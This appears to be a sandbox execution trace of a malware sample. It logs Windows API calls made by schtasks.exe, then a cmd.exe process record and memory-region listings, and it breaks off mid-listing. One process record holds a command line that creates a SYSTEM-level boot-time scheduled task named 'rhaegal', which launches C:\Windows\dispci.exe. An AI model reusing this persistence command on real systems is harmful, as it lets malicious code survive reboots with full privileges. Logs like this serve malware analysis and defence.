SetLastError (dwErrCode=0x490) [0015.530] SetLastError (dwErrCode=0x0) [0015.530] lstrlenW (lpString="delete") returned 6 [0015.530] _memicmp (_Buf1=0x384af0, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.530] SetLastError (dwErrCode=0x0) [0015.530] _memicmp (_Buf1=0x384b68, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.530] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3859a8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0015.530] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0015.530] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x385bb8 | out: lpData=0x385bb8) returned 1 [0015.530] VerQueryValueW (in: pBlock=0x385bb8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x31f5f4, puLen=0x31f5f8 | out: lplpBuffer=0x31f5f4*=0x385f54, puLen=0x31f5f8) returned 1 [0015.530] _memicmp (_Buf1=0x384b68, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.530] _vsnwprintf (in: _Buffer=0x3859a8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x31f5dc | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0015.530] VerQueryValueW (in: pBlock=0x385bb8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x31f604, puLen=0x31f600 | out: lplpBuffer=0x31f604*=0x385d80, puLen=0x31f600) returned 1 [0015.530] lstrlenW (lpString="schtasks.exe") returned 12 [0015.530] lstrlenW (lpString="schtasks.exe") returned 12 [0015.530] lstrlenW (lpString=".EXE") returned 4 [0015.530] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0015.530] lstrlenW (lpString="schtasks.exe") returned 12 [0015.530] lstrlenW (lpString=".EXE") returned 4 [0015.531] lstrlenW (lpString="schtasks") returned 8 [0015.531] lstrlenW (lpString="/delete") returned 7 [0015.531] _memicmp (_Buf1=0x384b68, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.531] _vsnwprintf (in: _Buffer=0x3859a8, _BufferCount=0x19, _Format="%s %s", _ArgList=0x31f5dc | out: _Buffer="schtasks /delete") returned 16 [0015.531] _memicmp (_Buf1=0x384bc8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.531] _memicmp (_Buf1=0x384be0, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.531] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x386640, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0015.531] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0015.531] _vsnwprintf (in: _Buffer=0x386598, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x31f5e0 | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37 [0015.531] SetLastError (dwErrCode=0x0) [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="delete") returned 6 [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="?") returned 1 [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="s") returned 1 [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="u") returned 1 [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="p") returned 1 [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="tn") returned 2 [0015.531] GetThreadLocale () returned 0x409 [0015.531] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0015.531] lstrlenW (lpString="f") returned 1 [0015.531] SetLastError (dwErrCode=0x0) [0015.531] SetLastError (dwErrCode=0x0) [0015.531] lstrlenW (lpString="/Delete") returned 7 [0015.531] lstrlenW (lpString="-/") returned 2 [0015.531] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0015.531] lstrlenW (lpString="delete") returned 6 [0015.531] lstrlenW (lpString="delete") returned 6 [0015.531] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.531] lstrlenW (lpString="Delete") returned 6 [0015.531] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.531] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|delete|") returned 8 [0015.531] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|Delete|") returned 8 [0015.531] lstrlenW (lpString="|delete|") returned 8 [0015.532] lstrlenW (lpString="|Delete|") returned 8 [0015.532] StrStrIW (lpFirst="|delete|", lpSrch="|Delete|") returned="|delete|" [0015.532] SetLastError (dwErrCode=0x0) [0015.532] SetLastError (dwErrCode=0x0) [0015.532] SetLastError (dwErrCode=0x0) [0015.532] lstrlenW (lpString="/F") returned 2 [0015.532] lstrlenW (lpString="-/") returned 2 [0015.532] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0015.532] lstrlenW (lpString="delete") returned 6 [0015.532] lstrlenW (lpString="delete") returned 6 [0015.532] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] lstrlenW (lpString="F") returned 1 [0015.532] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|delete|") returned 8 [0015.532] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.532] lstrlenW (lpString="|delete|") returned 8 [0015.532] lstrlenW (lpString="|F|") returned 3 [0015.532] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0015.532] SetLastError (dwErrCode=0x490) [0015.532] lstrlenW (lpString="?") returned 1 [0015.532] lstrlenW (lpString="?") returned 1 [0015.532] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] lstrlenW (lpString="F") returned 1 [0015.532] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|?|") returned 3 [0015.532] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.532] lstrlenW (lpString="|?|") returned 3 [0015.532] lstrlenW (lpString="|F|") returned 3 [0015.532] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0015.532] SetLastError (dwErrCode=0x490) [0015.532] lstrlenW (lpString="s") returned 1 [0015.532] lstrlenW (lpString="s") returned 1 [0015.532] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] lstrlenW (lpString="F") returned 1 [0015.532] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|s|") returned 3 [0015.532] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.532] lstrlenW (lpString="|s|") returned 3 [0015.532] lstrlenW (lpString="|F|") returned 3 [0015.532] StrStrIW (lpFirst="|s|", lpSrch="|F|") returned 0x0 [0015.532] SetLastError (dwErrCode=0x490) [0015.532] lstrlenW (lpString="u") returned 1 [0015.532] lstrlenW (lpString="u") returned 1 [0015.532] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] lstrlenW (lpString="F") returned 1 [0015.532] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.532] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|u|") returned 3 [0015.532] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.532] lstrlenW (lpString="|u|") returned 3 [0015.532] lstrlenW (lpString="|F|") returned 3 [0015.532] StrStrIW (lpFirst="|u|", lpSrch="|F|") returned 0x0 [0015.532] SetLastError (dwErrCode=0x490) [0015.532] lstrlenW (lpString="p") returned 1 [0015.532] lstrlenW (lpString="p") returned 1 [0015.533] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] lstrlenW (lpString="F") returned 1 [0015.533] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|p|") returned 3 [0015.533] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.533] lstrlenW (lpString="|p|") returned 3 [0015.533] lstrlenW (lpString="|F|") returned 3 [0015.533] StrStrIW (lpFirst="|p|", lpSrch="|F|") returned 0x0 [0015.533] SetLastError (dwErrCode=0x490) [0015.533] lstrlenW (lpString="tn") returned 2 [0015.533] lstrlenW (lpString="tn") returned 2 [0015.533] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] lstrlenW (lpString="F") returned 1 [0015.533] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|tn|") returned 4 [0015.533] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.533] lstrlenW (lpString="|tn|") returned 4 [0015.533] lstrlenW (lpString="|F|") returned 3 [0015.533] StrStrIW (lpFirst="|tn|", lpSrch="|F|") returned 0x0 [0015.533] SetLastError (dwErrCode=0x490) [0015.533] lstrlenW (lpString="f") returned 1 [0015.533] lstrlenW (lpString="f") returned 1 [0015.533] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] lstrlenW (lpString="F") returned 1 [0015.533] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|f|") returned 3 [0015.533] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|F|") returned 3 [0015.533] lstrlenW (lpString="|f|") returned 3 [0015.533] lstrlenW (lpString="|F|") returned 3 [0015.533] StrStrIW (lpFirst="|f|", lpSrch="|F|") returned="|f|" [0015.533] SetLastError (dwErrCode=0x0) [0015.533] SetLastError (dwErrCode=0x0) [0015.533] SetLastError (dwErrCode=0x0) [0015.533] lstrlenW (lpString="/TN") returned 3 [0015.533] lstrlenW (lpString="-/") returned 2 [0015.533] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0015.533] lstrlenW (lpString="delete") returned 6 [0015.533] lstrlenW (lpString="delete") returned 6 [0015.533] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] lstrlenW (lpString="TN") returned 2 [0015.533] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.533] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x9, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|delete|") returned 8 [0015.533] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|TN|") returned 4 [0015.533] lstrlenW (lpString="|delete|") returned 8 [0015.533] lstrlenW (lpString="|TN|") returned 4 [0015.533] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0015.533] SetLastError (dwErrCode=0x490) [0015.533] lstrlenW (lpString="?") returned 1 [0015.533] lstrlenW (lpString="?") returned 1 [0015.533] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] lstrlenW (lpString="TN") returned 2 [0015.534] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|?|") returned 3 [0015.534] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|TN|") returned 4 [0015.534] lstrlenW (lpString="|?|") returned 3 [0015.534] lstrlenW (lpString="|TN|") returned 4 [0015.534] SetLastError (dwErrCode=0x490) [0015.534] lstrlenW (lpString="s") returned 1 [0015.534] lstrlenW (lpString="s") returned 1 [0015.534] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] lstrlenW (lpString="TN") returned 2 [0015.534] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|s|") returned 3 [0015.534] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|TN|") returned 4 [0015.534] lstrlenW (lpString="|s|") returned 3 [0015.534] lstrlenW (lpString="|TN|") returned 4 [0015.534] SetLastError (dwErrCode=0x490) [0015.534] lstrlenW (lpString="u") returned 1 [0015.534] lstrlenW (lpString="u") returned 1 [0015.534] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] lstrlenW (lpString="TN") returned 2 [0015.534] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|u|") returned 3 [0015.534] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|TN|") returned 4 [0015.534] lstrlenW (lpString="|u|") returned 3 [0015.534] lstrlenW (lpString="|TN|") returned 4 [0015.534] SetLastError (dwErrCode=0x490) [0015.534] lstrlenW (lpString="p") returned 1 [0015.534] lstrlenW (lpString="p") returned 1 [0015.534] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] lstrlenW (lpString="TN") returned 2 [0015.534] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x4, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|p|") returned 3 [0015.534] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|TN|") returned 4 [0015.534] lstrlenW (lpString="|p|") returned 3 [0015.534] lstrlenW (lpString="|TN|") returned 4 [0015.534] SetLastError (dwErrCode=0x490) [0015.534] lstrlenW (lpString="tn") returned 2 [0015.534] lstrlenW (lpString="tn") returned 2 [0015.534] _memicmp (_Buf1=0x384bf8, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] lstrlenW (lpString="TN") returned 2 [0015.534] _memicmp (_Buf1=0x384c28, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.534] _vsnwprintf (in: _Buffer=0x385280, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|tn|") returned 4 [0015.534] _vsnwprintf (in: _Buffer=0x385240, _BufferCount=0x5, _Format="|%s|", _ArgList=0x31f5c8 | out: _Buffer="|TN|") returned 4 [0015.535] lstrlenW (lpString="|tn|") returned 4 [0015.535] lstrlenW (lpString="|TN|") returned 4 [0015.535] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|" [0015.535] SetLastError (dwErrCode=0x0) [0015.535] SetLastError (dwErrCode=0x0) [0015.535] lstrlenW (lpString="rhaegal") returned 7 [0015.535] lstrlenW (lpString="-/") returned 2 [0015.535] StrChrIW (lpStart="-/", wMatch=0x72) returned 0x0 [0015.535] SetLastError (dwErrCode=0x490) [0015.535] SetLastError (dwErrCode=0x490) [0015.535] SetLastError (dwErrCode=0x0) [0015.535] lstrlenW (lpString="rhaegal") returned 7 [0015.535] StrChrIW (lpStart="rhaegal", wMatch=0x3a) returned 0x0 [0015.535] SetLastError (dwErrCode=0x490) [0015.535] SetLastError (dwErrCode=0x0) [0015.535] lstrlenW (lpString="rhaegal") returned 7 [0015.535] SetLastError (dwErrCode=0x0) [0015.535] lstrlenW (lpString="rhaegal") returned 7 [0015.535] SetLastError (dwErrCode=0x0) [0015.535] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x74e80000 [0015.535] GetProcAddress (hModule=0x74e80000, lpProcName="OpenSCManagerW") returned 0x74e863ad [0015.535] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x387e80 [0015.537] GetProcAddress (hModule=0x74e80000, lpProcName="OpenServiceW") returned 0x74e8714b [0015.537] OpenServiceW (hSCManager=0x387e80, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x387de0 [0015.537] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-winsvc-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x74e80000 [0015.538] GetProcAddress (hModule=0x74e80000, lpProcName="QueryServiceStatus") returned 0x74e84e4b [0015.538] QueryServiceStatus (in: hService=0x387de0, lpServiceStatus=0x31ec14 | out: lpServiceStatus=0x31ec14*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x2c1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0015.538] GetProcAddress (hModule=0x74e80000, lpProcName="CloseServiceHandle") returned 0x74e84dc3 [0015.538] CloseServiceHandle (hSCObject=0x387e80) returned 1 [0015.538] GetProcAddress (hModule=0x74e80000, lpProcName="CloseServiceHandle") returned 0x74e84dc3 [0015.538] CloseServiceHandle (hSCObject=0x387de0) returned 1 [0015.539] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0015.546] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0015.549] CoCreateInstance (in: rclsid=0x25230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x2520fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x31f020 | out: ppv=0x31f020*=0x603cc8) returned 0x0 [0015.580] TaskScheduler:ITaskService:Connect (This=0x603cc8, serverName=0x31ef90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x31efa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x31efb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x31efc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0015.582] TaskScheduler:IUnknown:AddRef (This=0x603cc8) returned 0x2 [0015.582] TaskScheduler:ITaskService:GetFolder (in: This=0x603cc8, Path=0x0, ppFolder=0x31f064 | out: ppFolder=0x31f064*=0x603d30) returned 0x0 [0015.583] GetThreadLocale () returned 0x409 [0015.583] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="rhaegal", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3 [0015.583] ITaskFolder:GetTask (in: This=0x603d30, Path="rhaegal", ppTask=0x31f00c | out: ppTask=0x31f00c*=0x0) returned 0x80070002 [0015.583] lstrlenW (lpString="rhaegal") returned 7 [0015.583] ITaskFolder:DeleteTask (This=0x603d30, Name="rhaegal", flags=0) returned 0x80070002 [0015.583] SetLastError (dwErrCode=0x80070002) [0015.583] GetLastError () returned 0x80070002 [0015.583] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x80070002, dwLanguageId=0x0, lpBuffer=0x31f028, nSize=0x0, Arguments=0x0 | out: lpBuffer="䛸91鿹&\x01") returned 0x2c [0015.602] GetLastError () returned 0x80070002 [0015.602] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44 [0015.602] SetLastError (dwErrCode=0x80070002) [0015.602] _memicmp (_Buf1=0x384be0, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.602] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x386640, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0015.602] lstrlenW (lpString="ERROR:") returned 6 [0015.602] _memicmp (_Buf1=0x391270, _Buf2=0x251ed8, _Size=0x7) returned 0 [0015.603] _vsnwprintf (in: _Buffer=0x395340, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x31f02c | out: _Buffer="ERROR: ") returned 7 [0015.603] _fileno (_File=0x76ae2940) returned 2 [0015.603] _errno () returned 0x6007d8 [0015.603] _get_osfhandle (_FileHandle=2) returned 0xb [0015.603] _errno () returned 0x6007d8 [0015.603] GetFileType (hFile=0xb) returned 0x2 [0015.603] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0015.603] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x31efc4 | out: lpMode=0x31efc4) returned 1 [0015.603] __iob_func () returned 0x76ae2900 [0015.603] __iob_func () returned 0x76ae2900 [0015.603] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0015.603] lstrlenW (lpString="ERROR: ") returned 7 [0015.603] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x395340*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x31efec, lpReserved=0x0 | out: lpBuffer=0x395340*, lpNumberOfCharsWritten=0x31efec*=0x7) returned 1 [0015.603] _fileno (_File=0x76ae2940) returned 2 [0015.603] _errno () returned 0x6007d8 [0015.603] _get_osfhandle (_FileHandle=2) returned 0xb [0015.603] _errno () returned 0x6007d8 [0015.603] GetFileType (hFile=0xb) returned 0x2 [0015.604] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0015.604] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x31eff0 | out: lpMode=0x31eff0) returned 1 [0015.604] __iob_func () returned 0x76ae2900 [0015.604] __iob_func () returned 0x76ae2900 [0015.604] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0015.604] lstrlenW (lpString="The system cannot find the file specified.\r\n") returned 44 [0015.604] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x394760*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x31f018, lpReserved=0x0 | out: lpBuffer=0x394760*, lpNumberOfCharsWritten=0x31f018*=0x2c) returned 1 [0015.604] IUnknown:Release (This=0x603d30) returned 0x0 [0015.604] TaskScheduler:IUnknown:Release (This=0x603cc8) returned 0x1 [0015.608] exit (_Code=1) Thread: id = 6 os_tid = 0x990 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x633f9000" os_pid = "0x998" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x960" cmd_line = "/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 524 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 525 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 526 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 527 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 528 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 529 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 530 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 531 start_va = 0x4a590000 end_va = 0x4a5dbfff entry_point = 0x4a59829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 532 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 533 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 534 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 535 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 536 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 537 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 538 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 539 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 540 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 541 start_va = 0x100000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 542 start_va = 0x744a0000 end_va = 